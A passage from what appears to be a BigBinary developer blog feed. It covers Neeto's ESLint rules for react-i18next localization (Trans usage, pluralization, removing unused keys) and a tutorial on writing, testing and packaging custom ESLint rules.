In such cases, you can use the <code>Trans</code> component, which will be explained in detail later in this blog post.</p><p><img src="/blog_images/2023/react-localization/no-multiple-translation-functions-under-same-parent.gif" alt="no-multiple-translation-functions-under-same-parent rule"></p><h3>no-translation-functions-in-string-interpolation</h3><p>This rule ensures that translation functions are not used inside string interpolation. The goal of this rule is the same as that of the previous rule, which is to prevent breaking up sentences into multiple parts. However, this rule applies to string interpolation instead of JSX.</p><p><img src="/blog_images/2023/react-localization/no-translation-functions-in-string-interpolation.gif" alt="no-translation-functions-in-string-interpolation rule"></p><h3>use-trans-components-and-values-prop</h3><p>Before delving into the details of this rule, let's familiarize ourselves with the <code>Trans</code> component offered by <code>react-i18next</code>. The <code>Trans</code> component is helpful when translating text containing React or HTML nodes. However, it's important to note that it may not be necessary in many cases. If your translation doesn't involve React or HTML nodes, you can simply use the standard <code>t</code> function. The <code>t</code> function is sufficient for most cases and is easier to use than the <code>Trans</code> component.</p><p>Now let's see an example where you need to use the <code>Trans</code> component. Suppose you want to translate the following sentence:</p><pre><code class="language-js">const ClickHereForMore = () =&gt; (
  &lt;div&gt;
    Click &lt;a href=&quot;www.neeto.com&quot;&gt;here&lt;/a&gt; for more information.
  &lt;/div&gt;
);</code></pre><p>If you use the standard <code>t</code> function, you would need to use three translation keys as shown below:</p><pre><code class="language-js">import { useTranslation } from &quot;react-i18next&quot;;

const ClickHereForMore = () =&gt; {
  const { t } = useTranslation();

  return (
    &lt;div&gt;
      {t(&quot;click&quot;)} &lt;a href=&quot;www.neeto.com&quot;&gt;{t(&quot;here&quot;)}&lt;/a&gt;{&quot; &quot;}
      {t(&quot;forMoreInformation&quot;)}
    &lt;/div&gt;
  );
};</code></pre><p>But you know that splitting sentences into multiple parts using multiple translation keys can be problematic when translating from one language to another. So, how can the above sentence be translated without splitting it into multiple parts? This is where the <code>Trans</code> component comes in handy.</p><p>Here's how to use the <code>Trans</code> component to translate the same sentence:</p><pre><code class="language-js">import { Trans } from &quot;react-i18next&quot;;

const ClickHereForMore = () =&gt; (
  &lt;Trans
    components={{ a: &lt;a href=&quot;www.neeto.com&quot; /&gt; }}
    i18nKey=&quot;clickHereMessage&quot;
  /&gt;
);</code></pre><p>The translation file for English would look like this:</p><pre><code class="language-json">{
  &quot;clickHereMessage&quot;: &quot;Click &lt;a&gt;here&lt;/a&gt; for more information.&quot;
}</code></pre><p>As shown in the example above, the <code>Trans</code> component enables us to translate entire sentences that include HTML or React nodes without breaking them into multiple parts.</p><p>There are two ways to use the <code>Trans</code> component.</p><h4>Approach 1</h4><pre><code class="language-js">import { Trans } from &quot;react-i18next&quot;;

const ClickHereForMore = ({ productName }) =&gt; (
  &lt;div&gt;
    &lt;Trans i18nKey=&quot;clickHereMessage&quot;&gt;
      Click &lt;a href=&quot;www.neeto.com&quot;&gt;here&lt;/a&gt; to know more about the{&quot; &quot;}
      {productName}
    &lt;/Trans&gt;
  &lt;/div&gt;
);</code></pre><p>The translation file for English would look like this:</p><pre><code class="language-json">{
  &quot;clickHereMessage&quot;: &quot;Click &lt;1&gt;here&lt;/1&gt; to know more about the &lt;3&gt;&quot;
}</code></pre><p>This approach, known as the indexed nodes approach, uses indexes to map the nodes and variables. Here you need to pass the string to be translated as a child of the <code>Trans</code> component. The <code>Trans</code> component will then map the nodes and variables to indexes. In the above code, <code>Click</code> is mapped to index <code>0</code>, the <code>anchor</code> tag is mapped to index <code>1</code>, the string <code>to know more about the</code> is mapped to index <code>2</code>, and the <code>productName</code> variable is mapped to index <code>3</code>. So if you want to wrap the <code>here</code> text with the <code>anchor</code> tag in the translation file, you would need to use the <code>&lt;1&gt;</code> and <code>&lt;/1&gt;</code> tags. Similarly, for the <code>productName</code> variable, you would need to use the <code>&lt;3&gt;</code> tag.
However, this approach is not recommended because it requires looking at both the code and the translation file to understand the mapping, making it difficult to read and maintain.</p><h4>Approach 2</h4><pre><code class="language-js">import { Trans } from &quot;react-i18next&quot;;

const ClickHereForMore = ({ productName }) =&gt; (
  &lt;div&gt;
    &lt;Trans
      components={{ a: &lt;a href=&quot;www.neeto.com&quot; /&gt; }}
      i18nKey=&quot;clickHereMessage&quot;
      values={{ productName }}
    /&gt;
  &lt;/div&gt;
);</code></pre><p>The translation file for English would look like this:</p><pre><code class="language-json">{
  &quot;clickHereMessage&quot;: &quot;Click &lt;a&gt;here&lt;/a&gt; to know more about the {{productName}}&quot;
}</code></pre><p>This approach, known as the named nodes approach, uses the <code>components</code> prop and the <code>values</code> prop to map the nodes and variables. In the above code, the <code>anchor</code> tag is mapped using the <code>components</code> prop, and the <code>productName</code> variable is mapped using the <code>values</code> prop. As you can see here, the named nodes approach is more readable and less prone to errors than the indexed nodes approach because it eliminates the need for guessing indexes.</p><p>So the purpose of the <code>use-trans-components-and-values-prop</code> rule is to enforce the usage of named nodes instead of indexed nodes in the <code>Trans</code> component.</p><p><img src="/blog_images/2023/react-localization/use-trans-components-and-values-prop.gif" alt="use-trans-components-and-values-prop rule"></p><h3>use-components-children-prop-in-trans</h3><p>Now that the rationale behind using the <code>Trans</code> component and its usage has been explained, let's delve into another challenge encountered when using <code>Trans</code> with <a href="https://neeto-ui.neeto.com/">neetoUI</a> components. <code>neetoUI</code> is an npm package that drives the user experience across all the Neeto products.
To illustrate the problem, let's consider the following example:</p><pre><code class="language-js">import { Button } from &quot;@bigbinary/neetoui&quot;;

const ClickHereForMore = () =&gt; (
  &lt;div&gt;
    Click &lt;Button href=&quot;www.neeto.com&quot; label=&quot;here&quot; /&gt; for more information.
  &lt;/div&gt;
);</code></pre><p>Here, the <code>Button</code> component accepts the content string via the <code>label</code> prop. But the <code>Trans</code> component doesn't support injecting translation keys via a custom prop like this. To localize this, you would have no other way but to break the sentence like this:</p><pre><code class="language-js">import { Button } from &quot;@bigbinary/neetoui&quot;;
import { Trans, useTranslation } from &quot;react-i18next&quot;;

const ClickHereForMore = () =&gt; {
  const { t } = useTranslation();

  return (
    &lt;Trans
      i18nKey=&quot;clickHereMessage&quot;
      components={{
        Button: &lt;Button href=&quot;www.neeto.com&quot; label={t(&quot;here&quot;)} /&gt;,
      }}
    /&gt;
  );
};</code></pre><p>The translation file for English would look like this:</p><pre><code class="language-json">{
  &quot;here&quot;: &quot;here&quot;,
  &quot;clickHereMessage&quot;: &quot;Click &lt;Button /&gt; for more information.&quot;
}</code></pre><p>As you can see here, you are forced to use one key for the whole message and another one for the <code>Button</code> label. This is not a good practice, as it involves using multiple translation keys for a single sentence.</p><p>To tackle this problem, support for the <code>children</code> prop has been incorporated into <code>neetoUI</code> components in order to render the <code>label</code>.
With this enhancement, the code can be rewritten as follows:</p><pre><code class="language-js">import { Button } from &quot;@bigbinary/neetoui&quot;;
import { Trans } from &quot;react-i18next&quot;;

const ClickHereForMore = () =&gt; (
  &lt;Trans
    components={{ Button: &lt;Button href=&quot;www.neeto.com&quot; /&gt; }}
    i18nKey=&quot;clickHereMessage&quot;
  /&gt;
);</code></pre><p>The translation file for English would look like this:</p><pre><code class="language-json">{
  &quot;clickHereMessage&quot;: &quot;Click &lt;Button&gt;here&lt;/Button&gt; for more information.&quot;
}</code></pre><p>As you can see, only one key is now used for the entire message, which makes it easier to manage. Therefore, this rule ensures that the <code>children</code> prop of <code>neetoUI</code> components is used instead of the <code>label</code> prop when used with the <code>Trans</code> component.</p><p><img src="/blog_images/2023/react-localization/use-components-children-prop-in-trans.gif" alt="use-components-children-prop-in-trans rule"></p><h3>use-translation-hook-in-components</h3><p>There are two options for translating content in React components: using the translation function from <code>i18next</code> and using the translation function from the <code>useTranslation</code> hook provided by the <code>react-i18next</code> package.
While both options work, it is recommended to use the translation function from the <code>useTranslation</code> hook due to the advantages it offers, which were discussed earlier.</p><p>So this rule enforces the use of the translation function from the <code>useTranslation</code> hook in React components.</p><p><img src="/blog_images/2023/react-localization/use-translation-hook-in-components.gif" alt="use-translation-hook-in-components rule"></p><h3>use-i18next-plurals</h3><p>This rule enforces the use of i18next's built-in plurals for pluralization. Before delving into i18next's built-in plurals, let's take a look at other commonly used approaches for pluralization.</p><h4>Approach 1</h4><p>In this approach, a single key is utilized for both the singular and plural forms.</p><pre><code class="language-js">import { useTranslation } from &quot;react-i18next&quot;;

const MembersInfo = ({ count }) =&gt; {
  const { t } = useTranslation();

  return &lt;div&gt;{t(&quot;membersWithCount&quot;, { count })}&lt;/div&gt;;
};</code></pre><p>The translation file for English would look like this:</p><pre><code class="language-json">{
  &quot;membersWithCount&quot;: &quot;{{count}} member(s)&quot;
}</code></pre><h4>Approach 2</h4><p>This approach uses two separate keys, one for the singular form and one for the plural form, and conditionally renders the appropriate key based on the count variable.</p><pre><code class="language-js">import { useTranslation } from &quot;react-i18next&quot;;

const MembersCount = ({ count }) =&gt; {
  const { t } = useTranslation();

  return (
    &lt;div&gt;
      {count === 1
        ?
          t(&quot;memberWithCount&quot;, { count })
        : t(&quot;membersWithCount&quot;, { count })}
    &lt;/div&gt;
  );
};</code></pre><p>The translation file for English would look like this:</p><pre><code class="language-json">{
  &quot;memberWithCount&quot;: &quot;{{count}} member&quot;,
  &quot;membersWithCount&quot;: &quot;{{count}} members&quot;
}</code></pre><p>However, these approaches are not recommended because they are lazy or hacky ways of approaching the problem. The recommended approach is to use i18next's built-in pluralization features, which allow for greater flexibility and consistency in translation.</p><p>Let's see how to use i18next's built-in pluralization feature. In this approach, two keys are used: one for the singular form and one for the plural form. The key for the singular form is suffixed with <code>_one</code>, and the key for the plural form is suffixed with <code>_other</code>. This is how i18next's built-in pluralization works. But in this case, you don't need to worry about selecting the appropriate key based on the count variable.
<code>i18next</code> will automatically select the appropriate key based on the count variable.</p><pre><code class="language-js">import { useTranslation } from &quot;react-i18next&quot;;

const MembersInfo = ({ count }) =&gt; {
  const { t } = useTranslation();

  return &lt;div&gt;{t(&quot;memberWithCount&quot;, { count })}&lt;/div&gt;;
};</code></pre><p>The translation file for English would look like this:</p><pre><code class="language-json">{
  &quot;memberWithCount_one&quot;: &quot;{{count}} member&quot;,
  &quot;memberWithCount_other&quot;: &quot;{{count}} members&quot;
}</code></pre><p>In this example, if the <code>count</code> is <code>1</code>, then the key <code>memberWithCount_one</code> will be used, and for any other <code>count</code> (including <code>0</code>), the key <code>memberWithCount_other</code> will be used.</p><p><code>_one</code> and <code>_other</code> are not the only available suffixes; there are other suffixes available as well. Please refer to the <a href="https://www.i18next.com/translation-function/plurals">Plurals documentation</a> on how to use them.</p><p>As per the Neeto standards, we add the <code>WithCount</code> suffix only if we want to display the count in the string. If all we want is to get the plural or singular words conditionally, the keys will be:</p><pre><code class="language-json">&quot;member_one&quot;: &quot;member&quot;,
&quot;member_other&quot;: &quot;members&quot;</code></pre><p><img src="/blog_images/2023/react-localization/use-i18next-plurals.gif" alt="use-i18next-plurals rule"></p><h3>use-pluralize-package</h3><p>At neeto, it is highly recommended to use i18next's built-in plurals feature for pluralizing words. However, in certain situations, the use of external packages like <a href="https://www.npmjs.com/package/pluralize">pluralize</a> may be necessary. One such example is when dealing with user inputs, which can't be anticipated beforehand and hence won't have a corresponding translation key in our translation files.
In such cases, the <code>pluralize</code> package can be used for pluralization.</p><p>However, we observed that different projects were using different pluralization packages, and some projects even developed their own custom pluralization functions. This resulted in a lack of consistency within the codebase. To address this issue, a unified approach was implemented, mandating the use of a single pluralization package across all projects. After careful consideration, the <code>pluralize</code> package was selected as it is the most popular pluralization package in the JavaScript ecosystem.</p><p>So this rule enforces the use of the <code>pluralize</code> package.</p><p><img src="/blog_images/2023/react-localization/use-pluralize-package.gif" alt="use-pluralize-package rule"></p><h2>Script prepared to remove unused translation keys</h2><p>Another problem faced was the accumulation of unused keys in the translation files. This situation often occurred when removing unused code without deleting the corresponding translation keys associated with the removed code. As a result, the translation files became bloated with a significant number of unused keys, making it challenging to maintain them effectively.</p><p>To solve this problem, a script was developed to remove unused translation keys from the translation files. This script is added to the <a href="https://www.npmjs.com/package/@bigbinary/neeto-commons-frontend">neeto-commons-frontend</a> package. <code>neeto-commons-frontend</code> is a package encapsulating common code across Neeto projects.</p><p>How does this script work? Let us see it with the help of an example.
Consider the following translation file:</p><pre><code class="language-json">{
  &quot;hello&quot;: &quot;Hello&quot;,
  &quot;button&quot;: {
    &quot;save&quot;: &quot;Save&quot;
  }
}</code></pre><p>The script will check whether the translation key <code>hello</code> is used in the codebase and, if not, it will remove the translation key <code>hello</code> from the translation file. Similarly, it will check whether the translation key <code>button.save</code> is used in the codebase and, if not, it will remove the translation key <code>button.save</code> from the translation file.</p><p>However, an additional challenge surfaced due to the usage of interpolated strings as translation keys in specific scenarios. For instance, consider the following code snippet:</p><pre><code class="language-js">import { useTranslation } from &quot;react-i18next&quot;;

const Button = ({ buttonType }) =&gt; {
  const { t } = useTranslation();

  return &lt;div&gt;{t(`button.${buttonType}`)}&lt;/div&gt;;
};</code></pre><p>Here, since the translation key is not a simple string, checking whether it is used in the codebase becomes complicated: searching for the translation key <code>button.save</code> in the codebase won't return any results, and hence the script will remove the translation key <code>button.save</code> from the translation file, even though it is actually used in the codebase.</p><p>To address this issue, we've made an improvement to the script. It now has a built-in capability to detect translation functions that use interpolated translation keys. These identified translation functions are then included in a section for manual verification at the end of the script. So, once the script has finished running, you should manually analyze the identified translation functions to ensure that the translation keys used in them are present in the translation file.
If any of these translation keys have been removed during the initial step, they should be added back to the translation file.</p><p>Below is a demo of the script in action:</p><p><img src="/blog_images/2023/react-localization/remove-unused-translation-keys.gif" alt="remove-unused-translation-keys script"></p><p>That's all for now. We hope you found this blog useful. Our goal was to provide valuable insights that can help you with your localization journey. By learning from our experiences and applying these strategies, we believe you will be better equipped to handle the challenges of localization.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Enhance code quality and performance with ESLint]]></title>
       <author><name>Krishnapriya S</name></author>
      <link href="https://www.bigbinary.com/blog/enhance-code-quality-and-performance-with-eslint"/>
      <updated>2023-07-25T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/enhance-code-quality-and-performance-with-eslint</id>
<content type="html"><![CDATA[<h2>Introduction</h2><p>ESLint is a widely adopted JavaScript linter that analyzes and enforces coding rules and guidelines. ESLint empowers developers by detecting errors, promoting best practices, and enhancing code readability. This blog explores the fundamental concepts of ESLint, from installing the necessary dependencies to customizing rules and integrating these custom rules into your host projects.</p><h2>Configure ESLint on a project</h2><p>To set up ESLint in your host project, install the ESLint package under <code>devDependencies</code> as it is only used for development and not in production:</p><pre><code class="language-bash">npm install -D eslint
# or
yarn add -D eslint</code></pre><p>Now, you need to provide the required ESLint configurations. You can generate your ESLint config file using either of the below commands:</p><pre><code class="language-bash">npx eslint --init
# or
yarn run eslint --init</code></pre><p>This will prompt multiple options. You can proceed by selecting options that suit your use case. This generates a config file called <code>.eslintrc</code> in the format you selected (<code>.json</code>, <code>.js</code>, etc).
Here is an example of <code>.eslintrc.js</code>:</p><pre><code class="language-javascript">module.exports = {
  root: true,
  env: {
    node: true,
    browser: true,
    es2021: true,
  },
  parserOptions: {
    ecmaVersion: 2021,
    sourceType: &quot;module&quot;,
  },
  extends: [&quot;eslint:recommended&quot;, &quot;plugin:react/recommended&quot;],
  plugins: [&quot;react&quot;],
  rules: {
    &quot;no-console&quot;: &quot;warn&quot;,
    &quot;no-unused-vars&quot;: &quot;error&quot;,
  },
  settings: {
    react: {
      version: &quot;detect&quot;,
    },
  },
};</code></pre><ul><li><p>The <code>root</code> property is set to true to indicate that this is the root configuration file and should not inherit rules from parent directories.</p></li><li><p>The <code>env</code> property specifies the target environments where the code will run, including node, browser, and es2021 for ECMAScript 2021 features.</p></li><li><p>In <code>parserOptions</code>, we specify JavaScript options like JSX support or ECMA version.</p></li><li><p>The <code>plugins</code> property specifies the ESLint plugins to be used. Let us say you are working on a React project. You want your code to follow some React best practices and React-specific rules. You can achieve this by adding <code>eslint-plugin-react</code>.</p></li><li><p>The <code>extends</code> property includes an array of preset configurations to extend from, like <code>eslint:recommended</code> and <code>plugin:react/recommended</code>.</p></li><li><p>The <code>settings</code> property includes additional settings for specific plugins. In this case, we set the React version to <code>detect</code> for the React plugin, so that the React version is detected from our <code>package.json</code>.</p></li><li><p>In <code>rules</code>, we specify custom rule configurations for the codebase.
For instance, the rule <code>no-unused-vars</code> helps identify and throw errors for unused variables in your code, while <code>no-console</code> warns against using <code>console.log()</code> statements in production code. All pre-existing rules are available in this <a href="https://eslint.org/docs/rules/">documentation</a> by ESLint. Rules have three error levels:</p><pre><code class="language-javascript">rules: {
  &quot;no-console&quot;: &quot;warn&quot;, // Can also use 1
  &quot;no-unused-vars&quot;: 2, // Can also use &quot;error&quot;
  &quot;no-alert&quot;: &quot;off&quot;, // Can also use 0
}</code></pre><ul><li><p><code>error</code> or <code>2</code>: This will turn on the rule as an error. This means that ESLint will report violations of this rule as errors. Rules are typically set to <code>error</code> to enforce compliance with the rule during continuous integration testing, pre-commit checks, and pull request merging because doing so causes ESLint to exit with a non-zero exit code.</p></li><li><p><code>warn</code> or <code>1</code>: If you don't want to enforce compliance with a rule but would still like ESLint to report the rule's violations, set the severity to <code>warn</code>. This will report violations of this rule as warnings.</p></li><li><p><code>off</code> or <code>0</code>: This means the rule is turned <code>off</code> and will not be enforced. This can be useful if you want to disable a specific rule temporarily throughout your project or if you don't find a particular rule relevant to your project.</p></li></ul></li></ul><h2>Custom rules</h2><p>While ESLint comes bundled with a vast array of built-in rules, its true potential lies in the ability to create custom rules tailored to your project's unique requirements.</p><p>At the heart of every ESLint rule lies a well-crafted JavaScript object that defines its behavior.
But, before we dive into the basic structure of a custom ESLint rule, there is something you need to get familiar with, called an AST (Abstract Syntax Tree).</p><h3>Abstract Syntax Tree (AST)</h3><p>An AST can be thought of as a representation that dissects your code into a tree-like structure of interconnected nodes. An ESLint parser converts code into an abstract syntax tree that ESLint can evaluate. Consider the following JavaScript code snippet:</p><pre><code class="language-javascript">const sum = (x, y) =&gt; x + y;</code></pre><p>This is how its AST looks:</p><p><img src="/blog_images/2023/enhance-code-quality-and-performance-with-eslint/ast_demo.gif" alt="AST Demo"></p><p>In this example, the root node is the <code>Program</code> node, which represents the entire code file. Within it, there are several nested nodes, <code>VariableDeclarator</code>, <code>ArrowFunctionExpression</code>, and so on, each dedicated to different parts of the code. As demonstrated in the animation, when hovering over each node, the corresponding code segment on the LHS is highlighted. To explore and interact with both code and its AST, you can utilize the <a href="https://astexplorer.net">AST Explorer</a> tool.</p><h3>Basic structure of a custom rule</h3><p>Now that you know what an AST is, let us learn how these trees help us in creating a custom rule. You will need to analyze the code's tree structure to find out which node is to be chosen as the <strong>visitor node</strong>. A visitor node represents the target node that is visited or traversed during the linting process.</p><p>To understand further, let us take a simple rule and try to build it. Let us implement the <code>no-var</code> rule. This rule encourages the use of the <code>let</code> and <code>const</code> keywords, instead of the <code>var</code> keyword, to declare variables.
This usage promotes block scoping and prevents any re-declarations.</p><p>The AST for a code snippet containing <code>var</code> would look like this:</p><p><img src="/blog_images/2023/enhance-code-quality-and-performance-with-eslint/var_keyword_ast_demo.gif" alt="Var Keyword AST Demo"></p><p>So, the node we are interested in examining is the <code>VariableDeclaration</code> node. Hence, this will be our visitor node. This node contains an attribute called <code>kind</code>, which holds the value <code>var</code>, <code>let</code>, or <code>const</code> depending on the keyword used. All we have to do is verify whether it is a <code>var</code> and then throw an error for that particular node.</p><p>We want this logic to run on all <code>VariableDeclaration</code> nodes:</p><pre><code class="language-javascript">if (node.kind === &quot;var&quot;) {
  // raise error
}</code></pre><p>Let us embed that logic inside an ESLint rule object:</p><pre><code class="language-javascript">module.exports = {
  meta: {
    type: &quot;problem&quot;, // Can be: &quot;problem&quot;, &quot;suggestion&quot; or &quot;layout&quot;.
    docs: {
      description: &quot;Disallow the use of var.&quot;,
      category: &quot;Best Practices&quot;,
    },
  },
  create: context =&gt; ({
    VariableDeclaration(node) {
      if (node.kind === &quot;var&quot;) {
        context.report({ node, message: &quot;Using var is not allowed.&quot; });
      }
    },
  }),
};</code></pre><ul><li>The <code>meta</code> object provides metadata about your rule, including its type, description, category, etc.</li><li>The <code>create</code> function is the entry point for your rule implementation. It is called by ESLint and provides the <code>context</code> object, which allows you to interact with the code being analyzed.</li><li>Within the <code>create</code> function, you can define one or more visitor methods that target specific node types in the AST. The rule logic will be defined inside the visitor methods. 
In our example, the logic needs to run only on <code>VariableDeclaration</code> nodes. Thus <code>VariableDeclaration</code> is the only visitor method defined.</li><li>You can check for violations and report errors using <code>context.report()</code>.</li></ul><p>This is an example of how your rule would report an error for that particular node, once integrated into your project:</p><p><img src="/blog_images/2023/enhance-code-quality-and-performance-with-eslint/eslint_error_example.gif" alt="ESlint Error Example"></p><h2>Testing ESLint rules</h2><p>Rule testing in ESLint involves verifying the behavior of custom rules by providing sample code snippets that should trigger violations (invalid cases) and code snippets that should pass without violations (valid cases). <strong>RuleTester</strong> is an ESLint utility that simplifies the process of defining and running such tests.</p><h3>Configuring RuleTester</h3><p>First, you need to create a <code>RuleTester</code> instance. You can fine-tune the parser options, environments, and other configurations when you create the instance:</p><pre><code class="language-javascript">const { RuleTester } = require(&quot;eslint&quot;);

const ruleTester = new RuleTester({
  parserOptions: {
    ecmaFeatures: { jsx: true },
    ecmaVersion: 2020,
    sourceType: &quot;module&quot;,
  },
});</code></pre><h3>Writing test cases</h3><p>Now, you can use RuleTester's <code>run()</code> method to craft scenarios in the <code>valid</code> and <code>invalid</code> arrays to cover all possible code variations, which will be tested against your rule. You can also provide the expected error message as the <code>message</code> property in <code>errors</code>. 
Your basic test will look something like this, for the <code>no-var</code> rule you implemented:</p><pre><code class="language-javascript">const { RuleTester } = require(&quot;eslint&quot;);
const rule = require(&quot;../rules/no-var&quot;);

const ruleTester = new RuleTester({
  parserOptions: {
    ecmaFeatures: { jsx: true },
    ecmaVersion: 2020,
    sourceType: &quot;module&quot;,
  },
});

ruleTester.run(&quot;no-var&quot;, rule, {
  valid: [&quot;let x = 10;&quot;, &quot;const x = 10;&quot;],
  invalid: [
    {
      code: &quot;var x = 10;&quot;,
      errors: [{ message: &quot;Using var is not allowed.&quot; }],
    },
  ],
});

console.log(&quot;Completed all tests for no-var rule&quot;);</code></pre><h2>Diving deeper into custom rule creation</h2><p>Let us create another rule that enforces the use of strict equality (===) over loose equality (==). Strict equality provides more accurate comparison results and helps prevent potential bugs caused by type coercion.</p><h3>Basic implementation</h3><ol><li><p>Create a new file called <code>strict-equality.js</code>.</p></li><li><p>Define the rule by providing a type, description, and <code>create</code> function to implement our logic.</p><pre><code class="language-javascript">module.exports = {
  meta: {
    type: &quot;problem&quot;,
    docs: {
      description: &quot;Enforce the use of strict equality.&quot;,
      category: &quot;Best Practices&quot;,
    },
  },
  create: context =&gt; ({
    // Implementation logic.
  }),
};</code></pre></li><li><p>Now we need to figure out the visitor node we need. This is where you can use <a href="https://astexplorer.net">AST Explorer</a>. 
Let us consider the below example:</p><pre><code class="language-javascript">if (a == b) {
  // Do something
}</code></pre><p>We can see that the AST notation for the same looks something like this:</p><pre><code class="language-javascript">{
  &quot;type&quot;: &quot;Program&quot;,
  &quot;body&quot;: [
    {
      &quot;type&quot;: &quot;IfStatement&quot;,
      &quot;test&quot;: {
        &quot;type&quot;: &quot;BinaryExpression&quot;,
        &quot;operator&quot;: &quot;==&quot;,
        &quot;left&quot;: {
          &quot;type&quot;: &quot;Identifier&quot;,
          &quot;name&quot;: &quot;a&quot;
        },
        &quot;right&quot;: {
          &quot;type&quot;: &quot;Identifier&quot;,
          &quot;name&quot;: &quot;b&quot;
        }
      },
      // Remaining attributes
    }
  ]
}</code></pre><p>From this, it is evident that the node we are interested in has the type <code>BinaryExpression</code>. All we have to check is whether the <code>operator</code> for this node is &quot;==&quot; and then throw an error for that particular node.</p></li><li><p>Let us write this logic into our <code>create</code> function, and report the error with a suitable message:</p><pre><code class="language-javascript">create: context =&gt; ({
  BinaryExpression(node) {
    if (node.operator !== &quot;==&quot;) return;

    context.report({
      node,
      message: &quot;Use strict equality instead of loose equality.&quot;,
    });
  },
}),</code></pre></li></ol><h3>Implementing automatic fix</h3><p>Right now, all our rule does is detect any loose equalities and show the error message for that line. Let us add some logic to provide an automatic fix for the detected errors. To achieve this, include the <code>fix</code> attribute in the <code>context.report()</code> method. We can create a string representing the corrected code and utilize the <code>replaceText</code> function provided by the <code>context.fixer</code> object to replace the specific <code>node</code> with the modified string. 
To know about all such functions offered by the <code>fixer</code> object, please check this <a href="https://eslint.org/docs/latest/extend/custom-rules#applying-fixes">documentation</a> on applying fixes.</p><p>Now, we need to create a string to replace the node with. Inspect this portion of the AST we generated earlier:</p><pre><code class="language-javascript">&quot;type&quot;: &quot;BinaryExpression&quot;,
&quot;operator&quot;: &quot;==&quot;,
&quot;left&quot;: {
  &quot;type&quot;: &quot;Identifier&quot;,
  &quot;name&quot;: &quot;a&quot;
},
&quot;right&quot;: {
  &quot;type&quot;: &quot;Identifier&quot;,
  &quot;name&quot;: &quot;b&quot;
}</code></pre><p>The LHS and RHS operands can be accessed as <code>node.left</code> and <code>node.right</code> respectively. The value of these operands can be fetched from the <code>name</code> attribute, and our fix string can be constructed like this:</p><pre><code class="language-js">`${node.left.name} === ${node.right.name}`;</code></pre><p>Hence, adding this logic to our rule:</p><pre><code class="language-javascript">module.exports = {
  meta: {
    // Other properties
    fixable: &quot;code&quot;, // Include this when your rule provides a fix.
  },
  create: context =&gt; ({
    BinaryExpression(node) {
      if (node.operator !== &quot;==&quot;) return;

      context.report({
        node,
        message: &quot;Use strict equality instead of loose equality.&quot;,
        fix: fixer =&gt;
          fixer.replaceText(node, `${node.left.name} === ${node.right.name}`),
      });
    },
  }),
};</code></pre><p>But what if the LHS or RHS contains expressions, like this:</p><pre><code class="language-javascript">if (array[index].type == a)</code></pre><p>In that case, <code>node.left</code> will have more nested nodes:</p><p><img src="/blog_images/2023/enhance-code-quality-and-performance-with-eslint/left_operator_ast.png" alt="Left Operator AST"></p><p>Now, we can't just proceed by using <code>node.left.name</code>. 
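</p><p>To see concretely why this fails, here is a hand-written approximation (for illustration only; real parsers attach more attributes) of the ESTree shape of <code>node.left</code> for <code>array[index].type</code>:</p><pre><code class="language-javascript">// Only `Identifier` nodes carry a `name`; a `MemberExpression` does not.
const left = {
  type: 'MemberExpression',
  object: {
    type: 'MemberExpression',
    object: { type: 'Identifier', name: 'array' },
    property: { type: 'Identifier', name: 'index' },
    computed: true,
  },
  property: { type: 'Identifier', name: 'type' },
  computed: false,
};

console.log(left.name); // undefined, so the fix string would become 'undefined === ...'</code></pre><p>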
So, how do we make sure that we don't lose any data? The <code>getSourceCode()</code> function is a utility provided by ESLint that allows you to retrieve the source code corresponding to a specific node in the <code>context</code>. We can obtain the source code as a string by using the <code>getText()</code> function on the node. So for the above example, we can write:</p><pre><code class="language-javascript">context.getSourceCode().getText(node.left); // Returns `array[index].type`</code></pre><p>Now, let us modify our <code>create</code> function to handle this edge case, and our completed rule would look like this:</p><pre><code class="language-javascript">module.exports = {
  meta: {
    type: &quot;problem&quot;,
    docs: {
      description: &quot;Enforce the use of strict equality.&quot;,
      category: &quot;Best Practices&quot;,
    },
    fixable: &quot;code&quot;,
  },
  create: context =&gt; ({
    BinaryExpression(node) {
      if (node.operator !== &quot;==&quot;) return;

      context.report({
        node,
        message: &quot;Use strict equality instead of loose equality.&quot;,
        fix: fixer =&gt; {
          const leftNode = context.getSourceCode().getText(node.left);
          const rightNode = context.getSourceCode().getText(node.right);

          return fixer.replaceText(node, `${leftNode} === ${rightNode}`);
        },
      });
    },
  }),
};</code></pre><h3>Adding tests for the rule</h3><p>In the earlier sections, you saw how to write tests for your custom rule. Now, let us implement the same for our <code>strict-equality</code> rule. We need to add valid and invalid cases as strings to the respective arrays. Inside the <code>invalid</code> array, you can make use of the <code>output</code> attribute to provide the expected fixed code for that particular invalid case. 
So our tests will look like this:</p><pre><code class="language-javascript">const { RuleTester } = require(&quot;eslint&quot;);
const rule = require(&quot;../rules/strict-equality&quot;);

const ruleTester = new RuleTester({
  parserOptions: {
    ecmaFeatures: { jsx: true },
    ecmaVersion: 2020,
    sourceType: &quot;module&quot;,
  },
});

const message = &quot;Use strict equality instead of loose equality.&quot;;

ruleTester.run(&quot;strict-equality&quot;, rule, {
  valid: [
    &quot;if (a === b) {}&quot;,
    &quot;if (a === b) alert(1)&quot;,
    &quot;if (a === b) { alert(1) }&quot;,
  ],
  invalid: [
    {
      code: &quot;if (a == b) {}&quot;,
      errors: [{ message }],
      output: &quot;if (a === b) {}&quot;,
    },
    {
      code: &quot;if (getUserRole(user) == Roles.DEFAULT) grantAccess(user);&quot;,
      errors: [{ message }],
      output: &quot;if (getUserRole(user) === Roles.DEFAULT) grantAccess(user);&quot;,
    },
  ],
});

console.log(&quot;Completed all tests for strict-equality rule&quot;);</code></pre><h2>Custom ESLint plugins</h2><p>In real-world scenarios, we will have multiple custom rules and configurations that we want to enforce consistently across our projects. This is where custom ESLint plugins become invaluable, as they allow us to bundle and package all these elements into a single plugin. In the Neeto ecosystem, we use our custom plugin, <code>eslint-plugin-neeto</code>, to maintain a uniformly structured codebase.</p><p>In this section, we will create a custom ESLint plugin for the custom rules we created, and learn how to integrate it into our projects.</p><h3>Getting started with a custom plugin</h3><ol><li><p>Create a new directory and initialize a new npm package for your plugin. 
The package name should always follow the naming format <code>eslint-plugin-*</code>:</p><pre><code class="language-bash">mkdir eslint-plugin-custom
cd eslint-plugin-custom
npm init -y</code></pre></li><li><p>Arrange our previously defined rules and tests in this folder structure:</p><pre><code class="language-javascript">eslint-plugin-custom
  package.json
  index.js
  src
    rules
      no-var.js
      strict-equality.js
    tests
      index.js
      no-var.js
      strict-equality.js
